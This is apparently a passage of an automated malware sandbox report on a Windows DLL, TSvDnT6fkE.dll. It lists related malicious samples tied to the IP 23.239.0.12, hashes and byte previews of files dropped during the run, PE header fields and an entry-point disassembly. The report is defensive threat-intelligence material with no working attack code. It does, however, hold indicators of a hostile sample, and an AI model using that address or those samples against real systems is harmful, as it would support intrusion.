                                                                                              RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                                                yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                                                  x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                                                    lc4KFeS296.dllGet hashmaliciousBrowse
                                                                                                      36yjawe0S4.dllGet hashmaliciousBrowse
                                                                                                        Ns2al4764F.dllGet hashmaliciousBrowse
                                                                                                          cX9TLU9gnx.dllGet hashmaliciousBrowse
                                                                                                            56vvRzZVQI.dllGet hashmaliciousBrowse
                                                                                                              8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                                                                yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                  bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                    wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                      yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                        bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                          6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                                                                                            2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                                                                                              sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                                                                                                40Gbs8Qkm6.dllGet hashmaliciousBrowse
                                                                                                                                  wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                                    No context
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    LINODE-APLinodeLLCUSXp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    lc4KFeS296.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    36yjawe0S4.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    Ns2al4764F.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    cX9TLU9gnx.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    56vvRzZVQI.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    40Gbs8Qkm6.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    51c64c77e60f3980eea90869b68c58a8Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    lc4KFeS296.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    36yjawe0S4.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    Ns2al4764F.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    cX9TLU9gnx.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    56vvRzZVQI.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    40Gbs8Qkm6.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                                    • 23.239.0.12
                                                                                                                                    No context
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):8192
                                                                                                                                    Entropy (8bit):0.3593198815979092
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                                                    MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                                                    SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                                                    SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                                                    SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:MPEG-4 LOAS
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1310720
                                                                                                                                    Entropy (8bit):0.24944884190976535
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU49:BJiRdwfu2SRU49
                                                                                                                                    MD5:9639C167DA9D3FB325CFF1AC5B8709D2
                                                                                                                                    SHA1:C519B30AF0C2CE17F8E4BC47281F98BD61BC4B7C
                                                                                                                                    SHA-256:D13A5941805ED8C9B73ACB02BE672F0C475C1783FB3E1AC153C6A5F7EB0263FC
                                                                                                                                    SHA-512:623D98A3BE9D6694B9EBDE4A37EC885D126D1F112E3F163148C1524A5C6BF31F4251B5513CB65AB37FFA4D356AE72050AF58C563592848E61B0E4EA2DA769F84
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x88899bbb, page size 16384, Windows version 10.0
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):786432
                                                                                                                                    Entropy (8bit):0.2506604112191496
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:qrv+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:qrkSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                    MD5:17CF7C49704155E0F528D22FE6C3AACF
                                                                                                                                    SHA1:06A4A8A1E721D796EE9B72061437CE4FAD831AF5
                                                                                                                                    SHA-256:66E12C30F6DF790A31627A2FFF5C7BB852057030FA0133F24A58D04A9735AC29
                                                                                                                                    SHA-512:9431CBF14D17219A3872CD0C100D2292071545FECD243770405BD171D11D7C907F09C44147DF527578AB5DC2F187F795A857DEFE1CFD78D9129B3D51ACB2E6BA
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:....... ................e.f.3...w........................)....../...zy.5+...z..h.(....../...zy...)..............3...w...........................................................................................................B...........@...................................................................................................... ......................................................................................................................................................................................................................................................2./...zy..................k~\./...zy.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):16384
                                                                                                                                    Entropy (8bit):0.07751119847368008
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:TqXT7vQOk/VKp0plb0fcpnhgfcpZnKurak+tplqll3Vkttlmlnl:WDrQOkoivPZKkmbQ3
                                                                                                                                    MD5:F02EB831B2F938AD4361499DE699105C
                                                                                                                                    SHA1:CBD55B969E5FFC50C466506FE2DFE9266971CFEE
                                                                                                                                    SHA-256:013B579C9CBEAEC6B936A6D110CBBFC69DC70821AB1A2E0E0B96C85BA43AFD59
                                                                                                                                    SHA-512:A580205E1F984A3FA91B92768F1D035A84951C324284CDDCF16487DA2F916AAD5D5C4FA4292AC7978EEB0FC7CA186E2F58D343F107C0E6B056F5E5C828C9CC12
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:...j.....................................3...w..5+...z.../...zy........../...zy../...zy..F.../...zA{.................k~\./...zy.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):65536
                                                                                                                                    Entropy (8bit):0.7853867791366174
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:q+mZNixJKaHK7gPri4ja9/u7sTS274ltQ:sjifKyK7gPri4jg/u7sTX4ltQ
                                                                                                                                    MD5:C471750C1D2A1BEF77A84BA4DD5A5E9F
                                                                                                                                    SHA1:D76226122E4A12F911CDEA8A77DF269BF7EE04E0
                                                                                                                                    SHA-256:C63D1AA0FEED6D106D66FD2444CE4FEB96164E68F9E839F90E13F1E587886EC1
                                                                                                                                    SHA-512:5C4E562681A59A0529130DC3FB189AEBF7A04E3D907F06FB9685334023A4DFBCE4C7B92988615D97CB319CD3C46B95B74DD6B97A103D42E18B6B45A23938B8D2
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.0.0.2.2.1.6.9.1.1.8.4.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.0.0.2.2.1.8.5.5.2.4.6.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.d.5.c.8.7.e.-.6.5.1.e.-.4.7.d.0.-.a.4.4.0.-.3.5.9.8.a.0.7.5.4.e.a.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.d.5.4.8.2.d.-.f.3.a.4.-.4.5.b.c.-.9.f.1.8.-.b.8.0.8.3.b.3.f.0.a.5.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.T.S.v.D.n.T.6.f.k.E...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.1.0.-.0.0.0.1.-.0.0.1.d.-.b.f.8.6.-.1.b.d.5.8.7.6.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.0.6.!.
                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Sat May 14 11:43:37 2022, 0x1205a4 type
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):73690
                                                                                                                                    Entropy (8bit):2.1315514154527797
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:CJKgvroV0CsAmv6IMyq7QE4X/AhWgkucbd:CJu2CsA06xyeN8/ALkd
                                                                                                                                    MD5:E2AAD3AFDBE22F4747BC860B13245102
                                                                                                                                    SHA1:503625F814981D3B92E7437D06615327B8325332
                                                                                                                                    SHA-256:D90B14CB1527661B436FE6FB112070835CB0AF33C251F7EFF4EE5B262EFA7C66
                                                                                                                                    SHA-512:59ED7026F7B282AF26D92AF003F186065B5C4C877914CFD81E7A5D721AA20914BD052A7324D6A5A6DB7C72D7F7F6B272829115D89D8EFE6B689777F8915519B8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:MDMP....... .........b....................................|...h...........L@..........`.......8...........T............................"...........$...................................................................U...........B......h%......Lw................J.....T.............b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):6660
                                                                                                                                    Entropy (8bit):3.7210032653996183
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:Rrl7r3GLNiYu2XWPnTRYuiS0eCprP89bTO3f/mSRm:RrlsNiJMUnTRYuiS02Tefe9
                                                                                                                                    MD5:7B53C2F4477007FD212C55A690F4CB1B
                                                                                                                                    SHA1:4FD56283FC5CE0CE04E818046B00DC600B53A1EC
                                                                                                                                    SHA-256:8E2313E2B43E74D13115ACE07ACBDD72C20B114CEAD0A0B694192747DB676CFA
                                                                                                                                    SHA-512:A28A2AD1C6A0B5822BF49716F8466342DC6C0143BF717F5A7E43339228773D7D4BE0FAFD6B3AD330EA89189F5C8217A836B319C0A8A77B6C8AE7A407E6EEFAE5
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.1.6.<./.P.i.d.>.......
                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4892
                                                                                                                                    Entropy (8bit):4.504677334989719
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:cvIwSD8zsMJgtBI9zDWgc8sqYjQ/8fm8M4JCMCvanFYh0yq8vhva3FZESC5SSd:uITfKFygrsqY0kJJWUFVvSd
                                                                                                                                    MD5:9E2EB0E3AF6FE0DF39F77E6CB3F882E5
                                                                                                                                    SHA1:DF5653393890780DB54F1A084C4ECF6E4B0C7DA5
                                                                                                                                    SHA-256:702C98E7A59A116BDAEAFB44647A93866F96861B07B08CC5BC092E740D81A617
                                                                                                                                    SHA-512:81299F4AEB421A2D6128AF93A56133BE1CE95933592D00EFB0E8EB3979AC123958CB79E67A009C7A2FDD3039A029D7965EE47CE74693A2CD28926FF71AF4B2A6
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1514694" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):55
                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):9062
                                                                                                                                    Entropy (8bit):3.1636971447413638
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zp++:j+s+v+b+P+m+0+Q+q+6++
                                                                                                                                    MD5:54D256326C9A518D94787306A9488E78
                                                                                                                                    SHA1:D76ECE00E8A248C20E53F911E9D11B043D1A774D
                                                                                                                                    SHA-256:5C28B8AC7F1057035AA35C8DD6250B9EA2F81A449D65C1023E95EFE86965715C
                                                                                                                                    SHA-512:ABA1669F0E30842470E611D036E56B228A05A1B16F21829A1FC64F25EFF526CEED8FE43EBCA6A0D29111B26681F2A476C36789406A7D5CEEBCE5E45C92B5051A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                    File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                    Entropy (8bit):6.482071422878548
                                                                                                                                    TrID:
                                                                                                                                    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                                    • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                                    • DOS Executable Generic (2002/1) 1.70%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                    File name:TSvDnT6fkE.dll
                                                                                                                                    File size:545280
                                                                                                                                    MD5:81fbd732b50a5593d32234e232d59ece
                                                                                                                                    SHA1:4e0d8774739060edf16cb1956934840bc8e9a55a
                                                                                                                                    SHA256:6aaf58cdff2d8c1a9f8ca6caaa1445d2574dcec8b25ef57c050ce3e688e06b5d
                                                                                                                                    SHA512:e512fc9fde6bf9ec20cd4c58aa34e8a3bffcd2e8b030a0ae4bba5f92c7267a09bf37a0f0de31a0b0064fecaa862a28c9343b5453477e3a81aea090e3b4b9fc19
                                                                                                                                    SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZyHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNV2
                                                                                                                                    TLSH:E5C4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."
                                                                                                                                    Icon Hash:74f0e4ecccdce0e4
                                                                                                                                    Entrypoint:0x1800423a8
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x180000000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                    Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:5
                                                                                                                                    OS Version Minor:2
                                                                                                                                    File Version Major:5
                                                                                                                                    File Version Minor:2
                                                                                                                                    Subsystem Version Major:5
                                                                                                                                    Subsystem Version Minor:2
                                                                                                                                    Import Hash:b268dbaa2e6eb6acd16e04d482356598
                                                                                                                                    Instruction
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+08h], ebx
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+10h], esi
                                                                                                                                    push edi
                                                                                                                                    dec eax
                                                                                                                                    sub esp, 20h
                                                                                                                                    dec ecx
                                                                                                                                    mov edi, eax
                                                                                                                                    mov ebx, edx
                                                                                                                                    dec eax
                                                                                                                                    mov esi, ecx
                                                                                                                                    cmp edx, 01h
                                                                                                                                    jne 00007FFB24A3A567h
                                                                                                                                    call 00007FFB24A3C6F4h
                                                                                                                                    dec esp
                                                                                                                                    mov eax, edi
                                                                                                                                    mov edx, ebx
                                                                                                                                    dec eax
                                                                                                                                    mov ecx, esi
                                                                                                                                    dec eax
                                                                                                                                    mov ebx, dword ptr [esp+30h]
                                                                                                                                    dec eax
                                                                                                                                    mov esi, dword ptr [esp+38h]
                                                                                                                                    dec eax
                                                                                                                                    add esp, 20h
                                                                                                                                    pop edi
                                                                                                                                    jmp 00007FFB24A3A410h
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+08h], ecx
                                                                                                                                    dec eax
                                                                                                                                    sub esp, 00000088h
                                                                                                                                    dec eax
                                                                                                                                    lea ecx, dword ptr [00014D05h]
                                                                                                                                    call dword ptr [0000FC7Fh]
                                                                                                                                    dec esp
                                                                                                                                    mov ebx, dword ptr [00014DF0h]
                                                                                                                                    dec esp
                                                                                                                                    mov dword ptr [esp+58h], ebx
                                                                                                                                    inc ebp
                                                                                                                                    xor eax, eax
                                                                                                                                    dec eax
                                                                                                                                    lea edx, dword ptr [esp+60h]
                                                                                                                                    dec eax
                                                                                                                                    mov ecx, dword ptr [esp+58h]
                                                                                                                                    call 00007FFB24A490EAh
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+50h], eax
                                                                                                                                    dec eax
                                                                                                                                    cmp dword ptr [esp+50h], 00000000h
                                                                                                                                    je 00007FFB24A3A5A3h
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+38h], 00000000h
                                                                                                                                    dec eax
                                                                                                                                    lea eax, dword ptr [esp+48h]
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+30h], eax
                                                                                                                                    dec eax
                                                                                                                                    lea eax, dword ptr [esp+40h]
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+28h], eax
                                                                                                                                    dec eax
                                                                                                                                    lea eax, dword ptr [00014CB0h]
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+20h], eax
                                                                                                                                    dec esp
                                                                                                                                    mov ecx, dword ptr [esp+50h]
                                                                                                                                    dec esp
                                                                                                                                    mov eax, dword ptr [esp+58h]
                                                                                                                                    dec eax
                                                                                                                                    mov edx, dword ptr [esp+60h]
                                                                                                                                    xor ecx, ecx
                                                                                                                                    call 00007FFB24A49098h
                                                                                                                                    jmp 00007FFB24A3A584h
                                                                                                                                    dec eax
                                                                                                                                    mov eax, dword ptr [eax+eax+00000000h]
                                                                                                                                    Programming Language:
                                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                                    • [LNK] VS2008 build 21022
                                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                    • [RES] VS2008 build 21022
                                                                                                                                    • [EXP] VS2008 build 21022
                                                                                                                                    • [C++] VS2008 build 21022
                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
